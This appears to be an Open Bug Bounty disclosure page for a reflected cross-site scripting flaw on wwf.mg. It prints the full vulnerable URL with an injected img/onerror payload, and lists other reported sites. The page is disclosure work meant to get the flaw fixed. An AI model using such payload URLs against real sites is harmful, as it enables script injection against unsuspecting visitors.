Report Email Alerts Open Bug Bounty: 106543 coordinated disclosures
Full Disclosure: 32293 vulnerabilities
Total Vulnerabilities Fixed: 36076
115641 vulnerable websites, 12580 VIP websites
2762 security researchers, 3854 notification subscribers

wwf.mg Security Vulnerability

On the 09.01.2017 security researcher SHWETABHSUMAN Approved XSS vulnerabilities: 202
Approved XSS vulnerabilities on VIP websites: 34
disclosed XSS vulnerability affecting wwf.mg website.

On the 09.01.2017 security researcher SHWETABHSUMAN discovered and reported XSS vulnerability affecting wwf.mg

On our side, we have notified website owner via all reasonable communication channels about the vulnerability, so it can be patched as quickly as possible.

You can check if the vulnerability is patched by clicking on the verification link below. If you have any contacts with the website administrator or a person in charge of its security - please send him, or her, this link as soon as possible.

Vulnerability Details

wwf.mg Description

Home | WWF. Home.

Vulnerable URL:

http://www.wwf.mg/wherewework/index.cfm?uGlobalSearch="/><img src=x onerror=prompt(/OPENBUGBOUNTY/)>&uGlobalLang=en

Research's Comment:

Tested on Android phone Mozilla browser

Other details:

Patched:No
Check for patch: Verify now



Latest check for patch:04.02.2017
Vulnerability type:XSS
Vulnerability status:Publicly disclosed
Alexa Rank2157123
VIP website status:No
Check wwf.mg for malware:Click here
Check wwf.mg SSL connection:Click here (Grade: F) Refresh Results

Mirror: Click here to view the mirror


Notification & Disclosure Timeline

9 January, 2017 at 15:40 GMTVulnerability reported via Full Disclosure
9 January, 2017 at 15:43 GMTNotification sent to generic security emails
9 January, 2017 at 15:43 GMTVulnerability details publicly disclosed

Comments:

Please login via twitter to be the first one to comment.


Latest Vulnerabilities on *.wwf.mg

Vulnerability Reported by Type Status Reported on
Full Disclosure
unpatched
09.01.2017
Full Disclosure
patched
26.06.2015

Latest Vulnerabilities Reported by SHWETABHSUMAN

Domain Type Status Reported
Full Disclosure
unpatched
10.03.2017
Full Disclosure
unpatched
10.03.2017
Full Disclosure
unpatched
10.03.2017
Full Disclosure
unpatched
09.03.2017
Full Disclosure
unpatched
07.03.2017
Full Disclosure
unpatched
07.03.2017
Full Disclosure
unpatched
07.03.2017
Full Disclosure
unpatched
06.03.2017
Full Disclosure
unpatched
28.02.2017
Full Disclosure
unpatched
27.02.2017
Full Disclosure
unpatched
25.02.2017
Full Disclosure
unpatched
24.02.2017
Full Disclosure
unpatched
10.02.2017
Full Disclosure
unpatched
09.02.2017
Full Disclosure
unpatched
09.02.2017
Full Disclosure
unpatched
09.02.2017
Full Disclosure
unpatched
08.02.2017
Full Disclosure
unpatched
07.02.2017
Full Disclosure
unpatched
07.02.2017
Full Disclosure
unpatched
07.02.2017

Latest VIP Submissions

pornmd.com
Reported by iandioch Twitter: @iandioch
Recommendations received: 1
Approved XSS vulnerabilities: 1059
Approved XSS vulnerabilities on VIP websites: 133
on 23.03.2017
lachainemeteo.com
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 23.03.2017
indonetwork.co.id
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 23.03.2017
hdfilmesonlinegratis.net
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 23.03.2017
sumra.net
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 23.03.2017
torrentfunk.com
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 23.03.2017
topky.sk
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 23.03.2017
pagseguro.uol.com.br
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 23.03.2017
litres.ru
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 22.03.2017
linkwithin.com
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 22.03.2017

Latest Submissions

coinshome.net
Reported by OmniGooch Recommendations received: 2
Approved XSS vulnerabilities: 2530
Approved XSS vulnerabilities on VIP websites: 145
on 23.03.2017
secure.ero-video.net
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 22.03.2017
login.ig.com.br
Reported by porthunter Twitter: @porthunter
Recommendations received: 1
Approved XSS vulnerabilities: 151
Approved XSS vulnerabilities on VIP websites: 30
on 22.03.2017
rotta8veiculos.com.br
Reported by iwoodythecowboy Twitter: @hackerous
Recommendations received: 8
Approved XSS vulnerabilities: 895
Approved XSS vulnerabilities on VIP websites: 21
on 22.03.2017
rietveldacademie.nl
Reported by HK9 Twitter: @_HK9_
Approved XSS vulnerabilities: 493
Approved XSS vulnerabilities on VIP websites: 11
on 22.03.2017
itutils.hanover.edu
Reported by DrStache Twitter: @DrStache_
Recommendations received: 27
Approved XSS vulnerabilities: 4530
Approved XSS vulnerabilities on VIP websites: 204
on 22.03.2017
vault.hanover.edu
Reported by DrStache Twitter: @DrStache_
Recommendations received: 27
Approved XSS vulnerabilities: 4530
Approved XSS vulnerabilities on VIP websites: 204
on 22.03.2017
exam.hanover.edu
Reported by DrStache Twitter: @DrStache_
Recommendations received: 27
Approved XSS vulnerabilities: 4530
Approved XSS vulnerabilities on VIP websites: 204
on 22.03.2017
hho-plus.com
Reported by DrStache Twitter: @DrStache_
Recommendations received: 27
Approved XSS vulnerabilities: 4530
Approved XSS vulnerabilities on VIP websites: 204
on 22.03.2017
maayanot.org
Reported by DrStache Twitter: @DrStache_
Recommendations received: 27
Approved XSS vulnerabilities: 4530
Approved XSS vulnerabilities on VIP websites: 204
on 22.03.2017